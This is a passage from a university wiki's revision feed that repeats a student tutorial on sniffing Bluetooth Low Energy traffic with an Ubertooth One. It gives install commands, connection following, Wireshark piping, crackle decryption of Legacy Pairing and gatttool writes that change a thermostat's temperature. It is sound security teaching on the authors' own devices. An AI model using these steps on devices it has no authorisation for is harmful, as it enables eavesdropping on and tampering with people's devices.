Simply replace the &#039;&#039;BD_ADDR&#039;&#039; with the address you found out earlier:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will produce a continuous output in the console.&lt;br /&gt;
&lt;br /&gt;
Furthermore, it is possible to redirect the output into a file or a pipe.&lt;br /&gt;
To achieve this, the syntax requires this generic command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt; -c &amp;lt;file or pipe&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 6 - Wireshark Analysis ===&lt;br /&gt;
&lt;br /&gt;
It is also possible to analyze the captured BLE packets in Wireshark. &lt;br /&gt;
For this purpose create a pipe via:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;mkfifo /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Following that, a new interface needs to be added to Wireshark in order to use the just created pipe.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark manage interface.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For this, the custom pipe &#039;&#039;/tmp/mypipe&#039;&#039; was added to the list of interfaces.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark add pipe.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now repeat the command from Step 5, but now with a redirected ouput to the pipe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D -c /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Select the custom interface you have just created in Wireshark to be able to analyze packtets with enhanced visibility and additional information.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark Thermo ConnectReq.png|frameless|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Exploiting BLE ==&lt;br /&gt;
&lt;br /&gt;
After capturing the data it is possible to use additional third party tools in combination with Ubertooth to obtain critical information.&lt;br /&gt;
In the following this is outlined through the utilization of the tools &#039;&#039;crackle&#039;&#039; and &#039;&#039;gatttool&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
=== Crackle ===&lt;br /&gt;
&lt;br /&gt;
Crackle is a tool that attempts to decrypt BLE Encryption.&lt;br /&gt;
Crackle is the right tool if you have captured a connection based on BLE Legacy Pairing.&lt;br /&gt;
It can not decrypt LE Secure Connections based transmissions.&lt;br /&gt;
Note that even if you are using Kali Linux the pre-installed version of crackle may be out of date without any possibility to update it through the respective repositories.&lt;br /&gt;
It is recommended that you use the master branch from crackle GitHub-repository [https://github.com/mikeryan/crackle].&lt;br /&gt;
&lt;br /&gt;
 git clone &amp;lt;nowiki&amp;gt;https://github.com/mikeryan/crackle.git&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 cd crackle&lt;br /&gt;
 make&lt;br /&gt;
&lt;br /&gt;
Now you can use the latest version of the tool by executing this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;./crackle -i &amp;lt;nowiki&amp;gt;&amp;lt;your_file.pcap&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this test, the captured connection revealed that the thermostat used no encryption and the fitness tracker used LE Secure Connections.&lt;br /&gt;
In this regard, crackle was unsuccessful in both instances.&lt;br /&gt;
When applied to the thermostat connection the output looked like this:&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle thermostat.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is due to the fact that the thermostat connection has no encryption. Naturally, there is nothing to break. Note that you can receive a similar result if the connection uses some form of encryption but ubertooth fails to capture the respective packets. Ubertooth cannot track 100% of the transmissions. &lt;br /&gt;
In the case of the fitness tracker the output clearly states that the device is running LE Secure Connections.&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle fitnesstracker.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To show that crackle can indeed decrypt keys of Legacy Pairing connections we run the tool on the sample data provided [https://lacklustre.net/bluetooth/crackle-sample.tgz here].&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle sampledata.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
=== Gatttool ===&lt;br /&gt;
&lt;br /&gt;
The utility &#039;&#039;gatttool&#039;&#039; can be used to manipulate characteristics attribute-values.&lt;br /&gt;
In the following we change the temperature value of the thermostat.&lt;br /&gt;
&lt;br /&gt;
Connect to your device using the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;gatttool -b 78:A5:04:62:71:3D -I&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will give you a prompt. Type &amp;quot;connect&amp;quot; to innitiate pairing with the device:&lt;br /&gt;
 &lt;br /&gt;
 [78:A5:04:62:71:3D][LE]&amp;gt; connect&lt;br /&gt;
 Attempting to connect to 78:A5:04:62:71:3D&lt;br /&gt;
 Connection successful&lt;br /&gt;
 &#039;&#039;&#039;[78:A5:04:62:71:3D]&#039;&#039;&#039;[LE]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now you can use a variety of commands to send read/write requests to your connected device:&lt;br /&gt;
:* &amp;lt;code&amp;gt;characteristics&amp;lt;/code&amp;gt; will list all characteristics and their respective handles available on the device&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-read-hnd 25&amp;lt;/code&amp;gt; will read the characteristics value of handle 0x0025&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-write-req 25 &amp;lt;nowiki&amp;gt;&amp;lt;value&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt; will write &#039;&#039;value&#039;&#039; to handle 0x0025&lt;br /&gt;
&lt;br /&gt;
Find out the handles you need to address by analyzing the captured BLE connection.&lt;br /&gt;
&lt;br /&gt;
== Student Project ==&lt;br /&gt;
=== Summary ===&lt;br /&gt;
These are the results of a student project on Bluetooth hacking using an [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
=== Requirements ===&lt;br /&gt;
&lt;br /&gt;
To produce the results, the book [[Hacking Internet of Things]] was used.&lt;br /&gt;
&lt;br /&gt;
The [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]] was tested on the following devices:&lt;br /&gt;
&lt;br /&gt;
* [[Osram Ledvance Smart+ Multicolor HomeKit Classic A60 10W E27]]&lt;br /&gt;
* [[DOG&amp;amp;BONE® Bluetooth-Vorhängeschloss, Rot]]&lt;br /&gt;
* [[EQIVA Bluetooth Smart Türschlossantrieb]]&lt;br /&gt;
&lt;br /&gt;
=== Authors ===&lt;br /&gt;
&lt;br /&gt;
The project was conducted for the course [[Einführendes Wahlfachprojekt]] in the summer term 2018 by the bachelor students:&lt;br /&gt;
&lt;br /&gt;
* Stefan Buschbeck&lt;br /&gt;
* Stefan Trinko&lt;br /&gt;
* Sebastian Ukleja&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Used Hardware ===&lt;br /&gt;
&lt;br /&gt;
* [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
* [[Room Thermostat Bluetooth ]]&lt;br /&gt;
* [[Mi band 4 fitness tracker]]&lt;br /&gt;
&lt;br /&gt;
=== Results ===&lt;br /&gt;
&lt;br /&gt;
* A [[:File:BLE Hacking Buschbeck Trinko Ukleja.pdf|documentation]] about the Bluetooth protocol itself and the analysis of the students&lt;br /&gt;
* The [[:File:Capture Files BLE.zip|capture files]] produced with the [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bluetooth.com/specifications/bluetooth-core-specification/&lt;br /&gt;
* https://github.com/greatscottgadgets/ubertooth/wiki&lt;br /&gt;
* https://github.com/mikeryan/crackle&lt;br /&gt;
* &lt;br /&gt;
[[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6071</id>
		<title>Bluetooth Sniffing with Ubertooth: A Step-by-step guide</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6071"/>
		<updated>2021-02-27T22:04:16Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Integrated the Bluetooth Hacking Ubertooth Page content.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This is a tutorial on how to sniff Bluetooth Low Energy (BLE) packets using the [[Ubertooth One, 2.4 GHz wireless development platform]] device.&lt;br /&gt;
This guide will detail the setup process and outline every step to capture a BLE connection. Furthermore, it will provide methods of bluetooth hacking, i.e cracking the encryption of a BLE connection and overwriting characteristics of a device.&lt;br /&gt;
This tutorial is created in regard to the seminar paper: [[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Linux-based Operating system: this test used [https://www.kali.org/downloads/ Kali Linux 64-Bit v2019.4 native install]&lt;br /&gt;
* BLE devices &lt;br /&gt;
* Tools: crackle, gatttool&lt;br /&gt;
&lt;br /&gt;
== BLE Fundamentals ==&lt;br /&gt;
&lt;br /&gt;
Fundamentals of the BLE Standard can be found at the [[BLE Fundamentals]] documentation.&lt;br /&gt;
&lt;br /&gt;
== Capturing BLE packets ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 - Prerequisites  ===&lt;br /&gt;
&lt;br /&gt;
Ubertooth One offers a well-documented GitHub-repository [https://github.com/greatscottgadgets/ubertooth/wiki]. Follwowing its instructions, the device&#039;s tools require several components. To fulfill the demands, one has to install:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config python3-numpy python3-qtpy&amp;lt;/code&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
In contrast to the guide, the &#039;&#039;python-pyside&#039;&#039; component needs to be installed separately using the &#039;&#039;pip-installer&#039;&#039;: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;pip install pyside3&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In order to for Ubertooth tools to decode Bluetooth packets the Bluetooth baseband library (&#039;&#039;libbtbb&#039;&#039;) needs to be downloaded and installed:&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar -xf libbtbb-2018-12-R1.tar.gz&lt;br /&gt;
 cd libbtbb-2018-12-R1&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Following that, the Ubertooth tools can be downloaded from the GitHub repository. They include host code, which enables sniffing Bluetooth packets. Additionally, they provide means to configure the Ubertooth device, including a simplified method for a firmware update.&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar xf ubertooth-2018-12-R1.tar.xz&lt;br /&gt;
 cd ubertooth-2018-12-R1/host&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Wireshark Bluetooth Baseband (&#039;&#039;BTBB&#039;&#039;) and Basic Rate/Enhanced Data Rate (&#039;&#039;BR/EDR&#039;&#039;) plugins facilitate the analysis of Bluetooth baseband traffic that has been captured within the Wireshark GUI. &lt;br /&gt;
The plugins need to be installed both separately from the &#039;&#039;libbtbb&#039;&#039; library. For the BTBB plugin the following commands have been used:&lt;br /&gt;
&lt;br /&gt;
 sudo apt-get install wireshark wireshark-dev libwireshark-dev cmake&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbb&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
It is important to state that the &#039;&#039;MAKE_INSTALL_LIBDIR&#039;&#039; directory can vary depending on the OS used and the wireshark installation. However, it should be the directory of existing Wireshark plugins.&lt;br /&gt;
The procedure needs to be repeated for the &#039;&#039;BR/EDR&#039;&#039; plugin.&lt;br /&gt;
&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbredr&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
=== Step 2 - Verification &amp;amp; Firmware Update ===&lt;br /&gt;
&lt;br /&gt;
After installing the prerequisits, the Ubertooth One device was plugged in through a USB port. It is of utmost importance to operate the Ubertooth One with the antenna attached to it. Otherwise, there is a risk of damaging the device. After inserting the device, verify that the system detects it:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will display information about USB buses in the system and the devices connected to them:&lt;br /&gt;
&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 001 Device 005: ID 04f2:b595 Chicony Electronics Co., Camera&lt;br /&gt;
 Bus 001 Device 004: ID 138a:003f Validity Sensors, Inc. VFS495&lt;br /&gt;
 Bus 001 Device 003: ID 8087:0a2b Intel Corp.&lt;br /&gt;
 Bus 001 Device 002: ID 1ea7:0064 SHARKOON Technologies 2.4G Mouse&lt;br /&gt;
 Bus 001 Device 014: ID 1d50:6002 &#039;&#039;&#039;OpenMoko, Inc. Ubertooth One&#039;&#039;&#039;&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upon first operation of the Ubertooth One it is necessary to update its firmware. The tools, which were downloaded before, facilitate a simplified way to achieve this task. Change the directory to the firmware directory of Ubertooth and execute the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-dfu -d bluetooth_rxtx.dfu -r&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the update is successful, this output will be produced:&lt;br /&gt;
&lt;br /&gt;
 Switching to DFU mode...&lt;br /&gt;
 Checking firmware signature&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 Detached&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To verify the firmware-version enter the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-util -v&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 3 - Ubertooth Spectrum Analyzer ===&lt;br /&gt;
&lt;br /&gt;
It is recommended to validate the functionality of the Ubertooth device via the spectrum analyzer, which is a tool to analyze the 2.4GHz band.&lt;br /&gt;
Specifically, it provides a Graphical User Interface (GUI) tool named ubertooth-specan-ui, which visually monitors the frequencies. This command will start the spectrum analyzer:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-specan-ui&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once successful, you can see the analyzer work its task through a powerful GUI:&lt;br /&gt;
&lt;br /&gt;
[[File:Ubertooth Spectrum Analyzer.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this case the figure shows several 802.11b networks in different channels, represented by green amplitudes.&lt;br /&gt;
The white amplitudes depict beacons that are visible during scanning. The red lines adjust to different centers of frequency channels in the 2.4GHz radio band.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 4 - Intercepting Lower Address Part (LAP) Packets ===&lt;br /&gt;
&lt;br /&gt;
The &#039;&#039;BD_ADDR&#039;&#039; makes the allocation of sniffed Bluetooth packets possible. The Ubertooth One can start the LAP scan with this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-rx&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A continuous output will follow on the console:&lt;br /&gt;
&lt;br /&gt;
 systime=1578428685 ch=26 LAP=3a5138 err=1 clkn=8355 clk_offset=5199 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428688 ch=26 LAP=3a5138 err=1 clkn=18479 clk_offset=5628 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428692 ch=43 LAP=3a5138 err=2 clkn=28967 clk_offset=6029 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428692 ch=47 LAP=3a5138 err=2 clkn=30327 clk_offset=6069 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428694 ch=52 LAP=3a5138 err=1 clkn=36948 clk_offset=87 s=-79 n=-55 snr=-24&lt;br /&gt;
 systime=1578428696 ch=53 LAP=3a5138 err=0 clkn=42360 clk_offset=302 s=-77 n=-55 snr=-22&lt;br /&gt;
&lt;br /&gt;
In the output &#039;&#039;&#039;ch&#039;&#039;&#039; represents the channel used by the device referenced in the LAP value. &lt;br /&gt;
The channel hopping is clearly comprehensible. &#039;&#039;&#039;Clkn&#039;&#039;&#039; indicates the master`s clock, while &#039;&#039;&#039;s&#039;&#039;&#039; references the signal strength and &#039;&#039;&#039;n&#039;&#039;&#039; states the value of noise.&lt;br /&gt;
Following that the &#039;&#039;&#039;snr&#039;&#039;&#039; value represents the signal-to-noise ratio. &lt;br /&gt;
This mode is especially helpful for undiscoverable devices, because it can calculate a BD_ADDR through the LAP in combination with the other parameters.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Alternatively, if the devices are discoverable, you can use the BLE scan of hcitools:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo hcitool lescan&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Among eventual other devices you should see the BLE devices you are testing, in this case the thermostat and the fitness tracker:&lt;br /&gt;
 &lt;br /&gt;
 D5:AA:D0:41:A3:60 Mi Smart Band 4&lt;br /&gt;
 78:A5:04:62:71:3D TepHeatB&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 - The Ubertooth-BTLE Tool ===&lt;br /&gt;
&lt;br /&gt;
One of the most powerful tools the Ubertooth One provides is the Bluetooth Low Energy sniffing mode.&lt;br /&gt;
Among other things, it can sniff and follow connections and even interfere with them.&lt;br /&gt;
In the &amp;quot;follow&amp;quot; mode, Ubertooth listens on one of the three advertising channels.&lt;br /&gt;
Once a BLE connection is established (on the advertising channel the device has been listenting to), Ubertooth will follow the hops along the data channels capturing the transmissions between the devices.&lt;br /&gt;
Per default, Ubertooth can be used to follow any connection it observes randomly.&lt;br /&gt;
Naturally, the device can be restricted to observe a specific device by providing the &#039;&#039;BD_ADDR&#039;&#039; of the device in question.&lt;br /&gt;
The general syntax of the corresponding command for &amp;quot;follow&amp;quot; mode looks like:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Simply replace the &#039;&#039;BD_ADDR&#039;&#039; with the address you found out earlier:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will produce a continuous output in the console.&lt;br /&gt;
&lt;br /&gt;
Furthermore, it is possible to redirect the output into a file or a pipe.&lt;br /&gt;
To achieve this, the syntax requires this generic command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt; -c &amp;lt;file or pipe&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 6 - Wireshark Analysis ===&lt;br /&gt;
&lt;br /&gt;
It is also possible to analyze the captured BLE packets in Wireshark. &lt;br /&gt;
For this purpose create a pipe via:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;mkfifo /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Following that, a new interface needs to be added to Wireshark in order to use the just created pipe.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark manage interface.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For this, the custom pipe &#039;&#039;/tmp/mypipe&#039;&#039; was added to the list of interfaces.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark add pipe.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now repeat the command from Step 5, but now with a redirected ouput to the pipe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D -c /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Select the custom interface you have just created in Wireshark to be able to analyze packtets with enhanced visibility and additional information.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark Thermo ConnectReq.png|frameless|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Exploiting BLE ==&lt;br /&gt;
&lt;br /&gt;
After capturing the data it is possible to use additional third party tools in combination with Ubertooth to obtain critical information.&lt;br /&gt;
In the following this is outlined through the utilization of the tools &#039;&#039;crackle&#039;&#039; and &#039;&#039;gatttool&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
=== Crackle ===&lt;br /&gt;
&lt;br /&gt;
Crackle is a tool that attempts to decrypt BLE Encryption.&lt;br /&gt;
Crackle is the right tool if you have captured a connection based on BLE Legacy Pairing.&lt;br /&gt;
It can not decrypt LE Secure Connections based transmissions.&lt;br /&gt;
Note that even if you are using Kali Linux the pre-installed version of crackle may be out of date without any possibility to update it through the respective repositories.&lt;br /&gt;
It is recommended that you use the master branch from crackle GitHub-repository [https://github.com/mikeryan/crackle].&lt;br /&gt;
&lt;br /&gt;
 git clone &amp;lt;nowiki&amp;gt;https://github.com/mikeryan/crackle.git&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 cd crackle&lt;br /&gt;
 make&lt;br /&gt;
&lt;br /&gt;
Now you can use the latest version of the tool by executing this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;./crackle -i &amp;lt;nowiki&amp;gt;&amp;lt;your_file.pcap&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this test, the captured connection revealed that the thermostat used no encryption and the fitness tracker used LE Secure Connections.&lt;br /&gt;
In this regard, crackle was unsuccessful in both instances.&lt;br /&gt;
When applied to the thermostat connection the output looked like this:&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle thermostat.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is due to the fact that the thermostat connection has no encryption. Naturally, there is nothing to break. Note that you can receive a similar result if the connection uses some form of encryption but ubertooth fails to capture the respective packets. Ubertooth cannot track 100% of the transmissions. &lt;br /&gt;
In the case of the fitness tracker the output clearly states that the device is running LE Secure Connections.&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle fitnesstracker.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To show that crackle can indeed decrypt keys of Legacy Pairing connections we run the tool on the sample data provided [https://lacklustre.net/bluetooth/crackle-sample.tgz here].&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle sampledata.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
=== Gatttool ===&lt;br /&gt;
&lt;br /&gt;
The utility &#039;&#039;gatttool&#039;&#039; can be used to manipulate characteristics attribute-values.&lt;br /&gt;
In the following we change the temperature value of the thermostat.&lt;br /&gt;
&lt;br /&gt;
Connect to your device using the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;gatttool -b 78:A5:04:62:71:3D -I&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will give you a prompt. Type &amp;quot;connect&amp;quot; to innitiate pairing with the device:&lt;br /&gt;
 &lt;br /&gt;
 [78:A5:04:62:71:3D][LE]&amp;gt; connect&lt;br /&gt;
 Attempting to connect to 78:A5:04:62:71:3D&lt;br /&gt;
 Connection successful&lt;br /&gt;
 &#039;&#039;&#039;[78:A5:04:62:71:3D]&#039;&#039;&#039;[LE]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now you can use a variety of commands to send read/write requests to your connected device:&lt;br /&gt;
:* &amp;lt;code&amp;gt;characteristics&amp;lt;/code&amp;gt; will list all characteristics and their respective handles available on the device&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-read-hnd 25&amp;lt;/code&amp;gt; will read the characteristics value of handle 0x0025&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-write-req 25 &amp;lt;nowiki&amp;gt;&amp;lt;value&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt; will write &#039;&#039;value&#039;&#039; to handle 0x0025&lt;br /&gt;
&lt;br /&gt;
Find out the handles you need to address by analyzing the captured BLE connection.&lt;br /&gt;
&lt;br /&gt;
== Demo Project ==&lt;br /&gt;
=== Summary ===&lt;br /&gt;
These are the results of a student project on Bluetooth hacking using an [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
=== Requirements ===&lt;br /&gt;
&lt;br /&gt;
To produce the results, the book [[Hacking Internet of Things]] was used.&lt;br /&gt;
&lt;br /&gt;
The [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]] was tested on the following devices:&lt;br /&gt;
&lt;br /&gt;
* [[Osram Ledvance Smart+ Multicolor HomeKit Classic A60 10W E27]]&lt;br /&gt;
* [[DOG&amp;amp;BONE® Bluetooth-Vorhängeschloss, Rot]]&lt;br /&gt;
* [[EQIVA Bluetooth Smart Türschlossantrieb]]&lt;br /&gt;
&lt;br /&gt;
=== Authors ===&lt;br /&gt;
&lt;br /&gt;
The project was conducted for the course [[Einführendes Wahlfachprojekt]] in the summer term 2018 by the bachelor students:&lt;br /&gt;
&lt;br /&gt;
* Stefan Buschbeck&lt;br /&gt;
* Stefan Trinko&lt;br /&gt;
* Sebastian Ukleja&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Used Hardware ===&lt;br /&gt;
&lt;br /&gt;
* [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
* [[Room Thermostat Bluetooth ]]&lt;br /&gt;
* [[Mi band 4 fitness tracker]]&lt;br /&gt;
&lt;br /&gt;
=== Results ===&lt;br /&gt;
&lt;br /&gt;
* A [[:File:BLE Hacking Buschbeck Trinko Ukleja.pdf|documentation]] about the Bluetooth protocol itself and the analysis of the students&lt;br /&gt;
* The [[:File:Capture Files BLE.zip|capture files]] produced with the [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bluetooth.com/specifications/bluetooth-core-specification/&lt;br /&gt;
* https://github.com/greatscottgadgets/ubertooth/wiki&lt;br /&gt;
* https://github.com/mikeryan/crackle&lt;br /&gt;
* &lt;br /&gt;
[[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Lightbulb_Worm&amp;diff=6070</id>
		<title>Lightbulb Worm</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Lightbulb_Worm&amp;diff=6070"/>
		<updated>2021-02-27T21:58:49Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added the reference&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
